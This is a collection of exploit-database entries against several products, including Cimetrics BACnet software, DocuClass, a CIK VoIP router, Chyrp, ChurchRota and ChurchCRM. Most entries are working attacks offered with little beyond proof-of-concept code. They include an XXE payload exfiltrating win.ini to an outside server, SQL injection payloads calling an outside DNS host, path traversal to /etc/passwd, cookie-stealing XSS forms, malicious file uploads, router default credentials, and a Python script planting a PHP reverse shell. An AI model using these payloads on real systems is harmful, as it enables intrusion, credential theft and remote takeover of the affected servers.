HKEY_LOCAL_MACHINE\SOFTWARE\Cimetrics\BACstac
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BACstac
The BACstac Service parameters (in ..\Services\BACstac) include plenty of keys,
one of which is the 'Tsml\ConnIpc' key with the default name: \\.\pipe\bacstac.
The vulnerability exist due to the improper permissions, with the 'F' flag (Full)
for 'Everyone' group.
Tested on: Microsoft Windows 7 Professional SP1 (EN)
Microsoft Windows 7 Ultimate SP1 (EN)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2017-5397
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5397.php
13.12.2016
--
C:\>sc qc bacstac
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: bacstac
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Cimetrics\BACstac v6.2f\bacstac-gtw.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : BACstac Protocol
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\>
C:\>accesschk.exe \pipe\bacstac
Accesschk v6.02 - Reports effective permissions for securable objects
Copyright (C) 2006-2016 Mark Russinovich
Sysinternals - www.sysinternals.com
\\.\Pipe\bacstac
RW Everyone
C:\>
Cimetrics BACnet Explorer 4.0 XXE Vulnerability
Vendor: Cimetrics, Inc.
Product web page: https://www.cimetrics.com
Affected version: 4.0.0.0
Summary: The BACnet Explorer is a BACnet client application that
helps auto discover BACnet devices.
Desc: BACnetExplorer suffers from an XML External Entity (XXE)
vulnerability using the DTD parameter entities technique resulting
in disclosure and retrieval of arbitrary data on the affected node
via out-of-band (OOB) attack. The vulnerability is triggered when
input passed to the xml parser is not sanitized while parsing the
xml project file.
Tested on: Microsoft Windows NT 6.1.7601 Service Pack 1
mscorlib.dll: 4.0.30319.34209 built by: FX452RTMGDR
BACstac Library: 1.5.6116.0
BACstac Service: 6.8.3
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2017-5398
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5398.php
30.01.2017
--
Open file evil.xml:
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE zsl [
<!ENTITY % remote SYSTEM "http://192.168.1.71:8080/xxe.xml">
%remote;
%root;
%oob;]>
xxe.xml on the web server:
<!ENTITY % payload SYSTEM "file:///C:/windows/win.ini">
<!ENTITY % root "<!ENTITY % oob SYSTEM 'http://192.168.1.71:8080/?%payload;'> ">
pyhon -m SimpleHTTPServer 8080
lab-PC - - [30/Jan/2017 00:47:44] "GET /?%5BMail%5D%0D%0ACMCDLLNAME32=mapi32.dll%0D%0ACMC=1%0D%0AMAPI=1%0D%0AMAPIX=1%0D%0AMAPIXVER=1.0.0.1%0D%0AOLEMessaging=1 HTTP/1.1" 301 -
lab-PC - - [30/Jan/2017 00:47:44] "GET /?%5BMail%5D%0D%0ACMCDLLNAME32=mapi32.dll%0D%0ACMC=1%0D%0AMAPI=1%0D%0AMAPIX=1%0D%0AMAPIXVER=1.0.0.1%0D%0AOLEMessaging=1/ HTTP/1.1" 200 -
# Exploit Title: [CIMA DocuClass Enterprise Content Management - Multiple Vulnerabilities]
# Date: [July 15, 2016]
# Exploit Author: [Karn Ganeshen (ipositivesecurity.blogspot.com)]
# Vendor Homepage: [cima-software.com]
# Version: [app version] (All)
# Tested on: [Microsoft Windows 2008 R2]
DocuClass is a modular and scalable enterprise content management (ECM) solution that allows organizations to streamline internal operations by significantly improving the way they manage their information within a business process.
Vulnerability Details
1. SQL Injection [Post Auth]
PoC
Vulnerable URLs & parameters:
A: POST request
/dcrpcserver.php [parameter - uid]
---
Parameter: uid (POST)
Type: boolean-based blind
Title: PostgreSQL boolean-based blind - Parameter replace
Payload: cmd=searchform&action=getsavedqueries&node=&uid=(SELECT (CASE WHEN (7877=7877) THEN 7877 ELSE 1/(SELECT 0) END))
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.2.5
back-end DBMS: Microsoft SQL Server 2008
Impact
An unauthenticated attacker can read or modify data in the application database, execute code, and compromise the host system.
B: GET request
/e-forms/dcformsserver.exe?action=createimagepdf&documentid=1408648&userid=755 [parameter - userid]
2. Access Control Flaws
DocuClass web application does not enforce strict access control.
PoC:
http://IP/medical_records/0000001337/0000000000123456.pdf
Dump all the documents with a bit of scripting.
Impact
An unauthenticated user can access stored documents by directly calling the document url.
3. Cross-Site Scripting
DocuClass web application lacks strong input validation, and multiple urls & parameters are vulnerable to cross-site scripting (CWE-79) attacks.
/e-forms/dcformsserver.exe [action parameter]
/e-forms/dcformsserver.exe [documentid parameter]
/e-forms/dcformsserver.exe [userid parameter]
/reports_server.php [cmd parameter]
/reports_server.php [reportid parameter]
/reports_server.php [uid parameter]
Impact
An attacker may be able to execute arbitrary scripts/code in the context of the user's browser.
+++++
####################################################################
#
# Exploit Title: CIK Telecom VoIP router SVG6000RW Privilege Escalation and Command Execution
# Date: 2014/12/10
# Exploit Author: Chako
# Vendor Homepage: https://www.ciktel.com/
#
####################################################################
Description:
CIK Telecom VoIP router SVG6000RW has a Privilege Escalation vulnerabilitie
and can lead to Command Execution.
Exploit:
1) Login as a normal user
Default Username: User Password:cikvoip
2) change URL to http://URL/adm/system_command.asp
and now u can run commands.
Example:
Command: ls /etc_rw/web
Result:
internet
cgi-bin
homemode_conf.asp
menu-en.swf
wireless
md5.js
hotelmode_conf.asp
waitAndReboot.asp
graphics
menu.swf
getMac.asp
quickconfig.asp
javascript
firewall
home.asp
customermode_conf.asp
wait.asp
station
login.asp
main.css
overview.asp
style
voip
lang
wps
usb
adm
# Exploit Title: Cibele Thinfinity VirtualUI 2.5.41.0 - User Enumeration
# Date: 13/12/2021
# Exploit Author: Daniel Morales, IT Security Team - ARHS Spikeseed
# Vendor Homepage: https://www.cybelesoft.com
# Software Link: https://www.cybelesoft.com/thinfinity/virtualui/
# Version: vulnerable < v3.0
# Tested on: Microsoft Windows
# CVE: CVE-2021-44848
How it works: By accessing the vector, an attacker can determine if a username exists thanks to the message returned; it can be presented in different languages according to the configuration of VirtualUI. Common users are administrator, admin, guest...
Payload: The vulnerable vector is "https://example.com/changePassword?username=USERNAME" where "USERNAME" need to be brute-forced.
Reference: https://github.com/cybelesoft/virtualui/issues/1
# Exploit Title: CI User Login and Management 1.0 - Arbitrary File Upload
# Dork: N/A
# Date: 2018-10-30
# Exploit Author: Ihsan Sencan
# Vendor Homepage 1: http://www.webprojectbuilder.com/item/user-login-and-management
# Vendor Homepage 2: https://sourceforge.net/projects/user-management-system/
# Software Link 1: https://kent.dl.sourceforge.net/project/php-user-login-management/PHP_CI_user_login_and_management-1.zip
# Software Link 2: https://netix.dl.sourceforge.net/project/user-management-system/PHP_CI_user_login_and_management-1.zip
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/user/add_edit
#
# http://localhost/[PATH]/assets/images/[FILE]
#
POST /[PATH]/user/add_edit HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------
212160558019833203481522967977
Content-Length: 727
-----------------------------212160558019833203481522967977
Content-Disposition: form-data; name="profile_pic"; filename="phpinfo.php"
Content-Type: application/force-download
<?php
phpinfo();
?>
-----------------------------212160558019833203481522967977
Content-Disposition: form-data; name="fileOld"
-----------------------------212160558019833203481522967977
Content-Disposition: form-data; name="users_id"
1
-----------------------------212160558019833203481522967977
Content-Disposition: form-data; name="user_type"
admin
-----------------------------212160558019833203481522967977
Content-Disposition: form-data; name="submit1"
-----------------------------212160558019833203481522967977--
HTTP/1.1 200 OK
Date: Tue, 30 Oct 2018 06:36:42 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Set-Cookie: ci_session=599e598042864923e909b54019831db9d06c116f; expires=Tue, 30-Oct-2018 08:36:42 GMT; Max-Age=7200; path=/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
refresh: 0;url=http://localhost/[PATH]/user/login
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET /[PATH]/assets/images/phpinfo_1540881402.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: ci_session=599e598042864923e909b54019831db9d06c116f
Connection: keep-alive
HTTP/1.1 200 OK
Date: Tue, 30 Oct 2018 06:37:08 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
# POC:
# 2)
# http://localhost/[PATH]/user/add_edit
#
<html>
<body>
<form method="post" enctype="multipart/form-data" action="http://localhost/[PATH]/user/add_edit">
<input id="fileUpload" name="profile_pic" type="file"><br>
<input name="fileOld" value="" type="hidden">
<input name="users_id" value="1" type="hidden">
<input name="user_type" value="admin" type="hidden">
<button name="submit1" type="submit" ">Ver Ayari</button>
</form>
</body>
</html>
source: https://www.securityfocus.com/bid/48672/info
Chyrp is prone to multiple cross-site scripting vulnerabilities, a local file-include vulnerability, an arbitrary file-upload vulnerability, and a directory-traversal vulnerability.
An attacker may leverage these issues to execute arbitrary script code on an affected computer and in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, open or run arbitrary files in the context of the webserver process, and gain access to sensitive information.
Chyrp 2.1 is vulnerable; other versions may also be affected.
C:
Appended ;*.php in script for the add photo feather (http://www.example.com/admin/?action=write_post&feather=photo) using intercepting proxy
<script type="text/javascript">
$(function(){
$("#photo").clone().attr("id", "photo_fake").addClass("swfupload_button").insertBefore("#photo")
photo = new SWFUpload({
upload_url : "http://www.example.com/chyrp_v2.0/modules/swfupload/upload_handler.php",
flash_url : "http://www.example.com/chyrp_v2.0/modules/swfupload/lib/swfupload.swf",
post_params: {"PHPSESSID" : "5o3bnghnijk4hlr7vnshi3vb76", "PHPSESSNAME" : "ChyrpSession", "ajax" : "true" },
file_size_limit : "100 MB",
file_types : "*.jpg;*.jpeg;*.png;*.gif;*.bmp;*.php", <-- #MODIFY!
file_types_description : "All Files",
file_queue_error_handler : fileQueueError,
file_dialog_complete_handler : fileDialogComplete,
upload_start_handler : uploadStart,
upload_progress_handler : uploadProgress,
upload_error_handler : uploadError,
upload_success_handler : uploadSuccess,
button_placeholder_id : "photo",
button_width : $("#photo_fake").width(),
button_height : $("#photo_fake").height(),
button_action : SWFUpload.BUTTON_ACTION.SELECT_FILES,
upload_complete_handler : uploadComplete
})
$("#SWFUpload_0")
.css({ position: "absolute", top: $("#photo_fake").offset().top, left: $("#photo_fake").offset().left })
.before('<div id="progress"><div class="back"><div class="fill"></div><div class="clear"></div></div></div>')
})
</script>
source: https://www.securityfocus.com/bid/48672/info
Chyrp is prone to multiple cross-site scripting vulnerabilities, a local file-include vulnerability, an arbitrary file-upload vulnerability, and a directory-traversal vulnerability.
An attacker may leverage these issues to execute arbitrary script code on an affected computer and in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, open or run arbitrary files in the context of the webserver process, and gain access to sensitive information.
Chyrp 2.1 is vulnerable; other versions may also be affected.
http://www.example.com/?action=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpassword%00
source: https://www.securityfocus.com/bid/48672/info
Chyrp is prone to multiple cross-site scripting vulnerabilities, a local file-include vulnerability, an arbitrary file-upload vulnerability, and a directory-traversal vulnerability.
An attacker may leverage these issues to execute arbitrary script code on an affected computer and in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, open or run arbitrary files in the context of the webserver process, and gain access to sensitive information.
Chyrp 2.1 is vulnerable; other versions may also be affected.
http://www.example.com/includes/lib/gz.php?file=/themes/../../../../../../../../../etc/passwd
source: https://www.securityfocus.com/bid/48672/info
Chyrp is prone to multiple cross-site scripting vulnerabilities, a local file-include vulnerability, an arbitrary file-upload vulnerability, and a directory-traversal vulnerability.
An attacker may leverage these issues to execute arbitrary script code on an affected computer and in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, open or run arbitrary files in the context of the webserver process, and gain access to sensitive information.
Chyrp 2.1 is vulnerable; other versions may also be affected.
http://www.example.comincludes/javascript.php?action=[XSS]
source: https://www.securityfocus.com/bid/48672/info
Chyrp is prone to multiple cross-site scripting vulnerabilities, a local file-include vulnerability, an arbitrary file-upload vulnerability, and a directory-traversal vulnerability.
An attacker may leverage these issues to execute arbitrary script code on an affected computer and in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, open or run arbitrary files in the context of the webserver process, and gain access to sensitive information.
Chyrp 2.1 is vulnerable; other versions may also be affected.
http://www.example.com/admin/help.php?title=[XSS]&body=[XSS]
# Chyrp 2.5.2 - Stored Cross-Site Scripting (XSS)
# Date: 2024-04-24
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://github.com/chyrp/
# Software Link: https://github.com/chyrp/chyrp/archive/refs/tags/v2.5.2.zip
# Version: 2.5.2
# Tested on: MacOS
### Steps to Reproduce ###
- Login from the address: http://localhost/chyrp/?action=login.
- Click on 'Write'.
- Type this payload into the 'Title' field: "><img src=x onerror=alert(
"Stored")>
- Fill in the 'Body' area and click 'Publish'.
- An alert message saying "Stored" will appear in front of you.
### PoC Request ###
POST /chyrp/admin/?action=add_post HTTP/1.1
Host: localhost
Cookie: ChyrpSession=c4194c16a28dec03e449171087981d11;
show_more_options=true
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0)
Gecko/20100101 Firefox/124.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,
*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;
boundary=---------------------------28307567523233313132815561598
Content-Length: 1194
Origin: http://localhost
Referer: http://localhost/chyrp/admin/?action=write_post
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
-----------------------------28307567523233313132815561598
Content-Disposition: form-data; name="title"
"><img src=x onerror=alert("Stored")>
-----------------------------28307567523233313132815561598
Content-Disposition: form-data; name="body"
<p>1337</p>
-----------------------------28307567523233313132815561598
Content-Disposition: form-data; name="status"
public
-----------------------------28307567523233313132815561598
Content-Disposition: form-data; name="slug"
-----------------------------28307567523233313132815561598
Content-Disposition: form-data; name="created_at"
04/24/24 12:31:57
-----------------------------28307567523233313132815561598
Content-Disposition: form-data; name="original_time"
04/24/24 12:31:57
-----------------------------28307567523233313132815561598
Content-Disposition: form-data; name="trackbacks"
-----------------------------28307567523233313132815561598
Content-Disposition: form-data; name="feather"
text
-----------------------------28307567523233313132815561598
Content-Disposition: form-data; name="hash"
11e11aba15114f918ec1c2e6b8f8ddcf
-----------------------------28307567523233313132815561598--
source: https://www.securityfocus.com/bid/52117/info
Chyrp is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input.
Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible.
Chyrp 2.1.2 is vulnerable; other versions may also be affected.
<form action="http://[host]/includes/error.php" method="post">
<input type="hidden" name="ajax" value="1" />
<input type="hidden" name="body" value='<script>alert(document.cookie);</script>' />
<input type="submit" id="btn">
</form>
source: https://www.securityfocus.com/bid/52115/info
Chyrp is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input.
Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible.
Chyrp 2.1.1 is vulnerable; other versions may also be affected.
<form action="http://[host]/includes/ajax.php" method="post">
<input type="hidden" name="action" value="preview" />
<input type="hidden" name="feather" value="" />
<input type="hidden" name="field" value="" />
<input type="hidden" name="content" value='<script>alert(document.cookie);</script>' />
<input type="submit" id="btn">
</form>
# Exploit Title: ChurchRota 2.6.4 - RCE (Authenticated)
# Date: 1/19/2021
# Exploit Author: Rob McCarthy (@slixperi)
# Vendor Homepage: https://github.com/Little-Ben/ChurchRota
# Software Link: https://github.com/Little-Ben/ChurchRota
# Version: 2.6.4
# Tested on: Ubuntu
import requests
from pwn import listen
############################################################################################################
# Description #
# Church Rota version 2.6.4 is vulnerable to authenticated remote code execution. #
# The user does not need to have file upload permission in order to upload and execute an arbitrary file. #
# The application is written primarily with PHP so we use PHP in our PoC #
############################################################################################################
# credentials of the low privilege user
USERNAME='slixperi'
PASSWORD='slixperi'
LISTENER_IP = '127.0.0.1'
LISTENER_PORT = '4444'
TARGET_IP = '127.0.0.1'
TARGET_PORT = '8081'
# set the credentials for login POST
credentials = {"username":USERNAME,"password":PASSWORD}
# create a session to preserve session state
sesh = requests.session()
# login as our low-privilege user (normally only admins can upload files)
sesh.post(f"http://{TARGET_IP}:{TARGET_PORT}/login.php", data=credentials)
# define the payload
payload = f"<?php $sock=fsockopen(\"{LISTENER_IP}\",{LISTENER_PORT});$proc=proc_open(\"/bin/sh -i\", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes); ?>"
# file upload
sesh.headers.update({"Referer": f"http://{TARGET_IP}:{TARGET_PORT}/resources.php?action=new"})
files = {'resourcefile': ("shell.php", payload)}
sesh.post(f"http://{TARGET_IP}:{TARGET_PORT}/resources.php?action=newsent", files=files)
l = listen(LISTENER_PORT)
# execute the file
sesh.get(f"http://{TARGET_IP}:{TARGET_PORT}/documents/shell.php")
l.interactive()
# Exploit Title: ChurchCRM v4.5.4 - Reflected XSS via Image (Authenticated)
# Date: 2023-04-17
# Exploit Author: Rahad Chowdhury
# Vendor Homepage: http://churchcrm.io/
# Software Link: https://github.com/ChurchCRM/CRM/releases/tag/4.5.4
# Version: 4.5.4
# Tested on: Windows 10, PHP 7.4.29, Apache 2.4.53
# CVE: CVE-2023-31699
Steps to Reproduce:
1. At first login your admin panel.
2. Then click the "Admin" menu and click "CSV Import '' and you will get
the CSV file uploader option.
3. now insert xss payload in jpg file using exiftool or from image
properties and then upload the jpg file.
4. you will see XSS pop up.
## Exploit Title: ChurchCRM v4.5.3-121fcc1 - SQL Injection
## Author: nu11secur1ty
## Date: 02.27.2023
## Vendor: http://churchcrm.io/
## Software: https://github.com/ChurchCRM/CRM
## Reference: https://portswigger.net/web-security/sql-injection
## Description:
In the manual insertion point 1 - parameter `EID` appears to be
vulnerable to SQL injection attacks.
No need for cookies, no need admin authentication and etc.
The attacker easily can steal information from this system by using
this vulnerability.
STATUS: HIGH Vulnerability - CRITICAL
[+]Payload:
```mysql
---
Parameter: EID (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
Payload: EID=(select
load_file('\\\\l4qwtfn9ngsxicbtklv0x1e1rsxllb92bq2gp6dv.smotaniak.com\\ior'))
OR NOT 2407=2407
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: EID=(select
load_file('\\\\l4qwtfn9ngsxicbtklv0x1e1rsxllb92bq2gp6dv.smotaniak.com\\ior'))
AND (SELECT 9547 FROM (SELECT(SLEEP(3)))QEvX)
Type: UNION query
Title: MySQL UNION query (UTF8) - 11 columns
Payload: EID=(select
load_file('\\\\l4qwtfn9ngsxicbtklv0x1e1rsxllb92bq2gp6dv.smotaniak.com\\ior'))
UNION ALL SELECT
'UTF8','UTF8',CONCAT(0x716a6b7a71,0x57646e6842556a56796a75716b504b4d6941786f7578696a4c557449796d76425645505670694b42,0x717a7a7871),'UTF8','UTF8','UTF8','UTF8','UTF8','UTF8','UTF8','UTF8','UTF8','UTF8'#
---
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/ChurchCRM/2023/ChurchCRM-4.5.3-121fcc1)
## Proof and Exploit:
[href](https://streamable.com/1eqhw2)
## Time spend:
01:00:00
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at
https://packetstormsecurity.com/https://cve.mitre.org/index.html and
https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>